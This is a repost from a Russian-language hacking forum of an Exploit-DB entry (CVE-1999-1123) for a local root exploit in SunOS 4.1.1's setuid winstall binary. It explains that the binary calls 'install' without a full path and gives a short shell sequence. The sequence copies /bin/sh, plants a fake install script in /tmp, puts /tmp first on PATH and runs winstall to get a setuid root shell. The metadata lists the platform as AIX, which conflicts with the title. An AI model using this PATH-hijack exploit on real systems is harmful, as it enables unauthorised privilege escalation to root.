Exploit SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19043
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
LOCAL
Платформа
AIX
CVE
cve-1999-1123
Дата публикации
1999-11-12
Код:
source: https://www.securityfocus.com/bid/22/info

This applies to sites that have installed Sun Source tapes only.

The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.

This makes it possible for users on that system to become root.

$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#
 
Источник
www.exploit-db.com

Похожие темы